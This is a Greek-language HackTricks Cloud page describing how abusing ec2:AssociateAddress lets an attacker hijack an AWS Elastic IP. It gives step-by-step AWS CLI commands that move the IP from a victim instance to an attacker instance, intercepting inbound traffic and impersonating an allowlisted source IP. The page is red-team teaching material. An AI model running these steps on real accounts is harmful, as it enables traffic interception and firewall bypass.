AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Δείτε τα subscription plans!
• Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Περίληψη

Καταχραστείτε ec2:AssociateAddress (και προαιρετικά ec2:DisassociateAddress) για να επανασυνδέσετε ένα Elastic IP (EIP) από ένα victim instance/ENI σε ένα attacker instance/ENI. Αυτό αναδρομολογεί την εισερχόμενη κίνηση που προορίζεται για το EIP προς τον attacker και επίσης επιτρέπει στον attacker να ξεκινήσει εξερχόμενη κίνηση με τη allowlisted δημόσια IP, παρακάμπτοντας εξωτερικά partner firewalls.

Προαπαιτούμενα

• Target EIP allocation ID στο ίδιο account/VPC.
• Attacker instance/ENI που ελέγχετε.
• Δικαιώματα:
• ec2:DescribeAddresses
• ec2:AssociateAddress στο EIP allocation-id και στο attacker instance/ENI
• ec2:DisassociateAddress (προαιρετικό). Σημείωση: --allow-reassociation θα αποσυνδέσει αυτόματα την προηγούμενη σύνδεση.

Επίθεση

Μεταβλητές

REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>

1. Εκχωρήστε ή εντοπίστε το EIP του θύματος (το lab εκχωρεί ένα καινούριο και το επισυνάπτει στο θύμα)

ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)

2. Επιβεβαιώστε ότι το EIP αυτή τη στιγμή επιλύεται στην υπηρεσία του θύματος (π.χ. έλεγχος για banner)

curl -sS http://$EIP | grep -i victim

3. Επανασυνδέστε το EIP στον επιτιθέμενο (αποσυνδέεται αυτόματα από το θύμα)

aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION

4. Επαληθεύστε ότι το EIP πλέον επιλύεται στην attacker service

sleep 5; curl -sS http://$EIP | grep -i attacker

Απόδειξη (μεταφερθείσα συσχέτιση):

aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text

Επιπτώσεις

• Inbound impersonation: Όλη η κίνηση προς το hijacked EIP παραδίδεται στο attacker instance/ENI.
• Outbound impersonation: Ο attacker μπορεί να ξεκινήσει κίνηση που φαίνεται να προέρχεται από το allowlisted public IP (χρήσιμο για την παράκαμψη φίλτρων partner/external source IP).

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Δείτε τα subscription plans!
• Εγγραφείτε στο 💬 Discord group ή την telegram group ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε τα hacking tricks υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.